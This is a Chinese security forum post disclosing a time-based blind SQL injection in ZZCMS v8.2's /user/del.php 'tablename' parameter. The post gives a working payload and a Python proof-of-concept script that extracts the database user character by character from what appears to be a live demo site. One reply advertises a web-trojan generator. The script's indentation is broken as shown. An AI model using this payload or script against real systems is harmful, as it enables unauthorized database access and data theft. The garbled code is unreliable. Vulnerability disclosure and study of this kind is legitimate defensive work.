K8安全团队
查看: 1002|回复: 2

CMS漏洞之ZZCMS v8.2最新SQL注入漏洞

[复制链接]
  • TA的每日心情
    开心
    2017-6-13 17:07
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2018-2-10 02:56:42 | 显示全部楼层 |阅读模式

    马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

    您需要 登录 才可以下载或查看,没有帐号?注册

    x
    CMS漏洞之ZZCMS v8.2最新SQL注入漏洞

    时间概述

    近期在一直都在审核CMS漏洞,连续数日,一无所获,甚是无聊,略有些许焦躁。

    暮然回首,桌角横幅,挚友所赠,书:《戒急用忍》,回想四爷当年之景,于今日此情此景,不甚寂寥。稍有感慨,正值审至ZZCMS V8.2,现SQL注入漏洞。大喜。

    1.白盒审计

    运用白盒审计工具,发现隐于暗处之SQL注入漏洞:/user/del.php

    代码位置: /user/del.php 12行,获取参数。


    由于存在checkid() 导致 $id无法进行注入,checkid() 代码如图。

    代码位置:/inc/function.php  49行


    在switch() 分支中不存在SQL注入就不展示代码了。在后面代码中 135行 发现存在SQL注入问题。


    $tablename 可控,可以进行SQL注入。由于$tablename 所在位置无需闭合引号和CMS过滤大于号和小于号(转换为实体),拼接为 select id,editor, from zzcms_answer where id = 1 and if((ascii(substr(user(),1,1)) =121),sleep(5),1)#where id in 1; 拼接成如此的SQL语句可以完成注入。

    2.漏洞利用

    测试payload:id=1&tablename=zzcms_answer where id = 1 and if((ascii(substr(user(),1,1)) =121),sleep(5),1)%23

    测试结果如图。


    3.POC

    用python完成POC进行批量漏洞利用,猜测用户名的第一个字符。

    [AppleScript] 纯文本查看 复制代码
    #!/usr/bin/env python
    
    # -*- coding: utf-8 -*-
    
    import requests
    
    import time
    
    
    
    payloads = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'    #匹配用的字符串
    
    url = "http://demo.zzcms.net/user/del.php"
    
    user = ''
    
    for i in range(1, 2):
    
            for payload in payloads:    #遍历取出字符
    
                    startTime = time.time()
    
                    post_data = "id=1&tablename=zzcms_answer where id = 1 and if((ascii(substr(user(),1,1))=" + str(ord(payload)) + "),sleep(5),1)%23".encode("utf-8")
    
                    response = requests.post(url, timeout=6, data=post_data, headers={"Content-Type": "application/x-www-form-urlencoded"}  )
    
    if time.time() - startTime > 5:
    
                            user = payload
    
    print 'user is:', user
    
    break
    
    print '\n[Done] current user is %s' % user

    该用户从未签到

    发表于 2018-2-28 23:44:57 | 显示全部楼层

    该用户从未签到

    发表于 2018-4-23 22:29:45 | 显示全部楼层
    18最新网马生成器EXP
    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    Powered by Discuz! X3.2 © 2001-2016 Comsenz Inc.

    返回顶部